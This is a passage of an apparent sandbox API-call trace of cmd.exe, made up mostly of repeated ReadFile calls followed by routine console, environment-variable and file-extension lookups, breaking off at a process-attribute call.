lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.258] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.259] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 
[0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.260] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, 
lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, 
lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.261] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.262] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.263] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.264] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, 
lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.265] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile 
(in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.266] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.341] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.341] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0236.342] _close (_FileHandle=3) returned 0 [0236.342] GetConsoleTitleW (in: lpConsoleTitle=0x2cf180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.342] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.342] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.343] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.343] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.343] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.343] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.343] GetConsoleTitleW (in: lpConsoleTitle=0x2cef14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.343] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ced9c, 
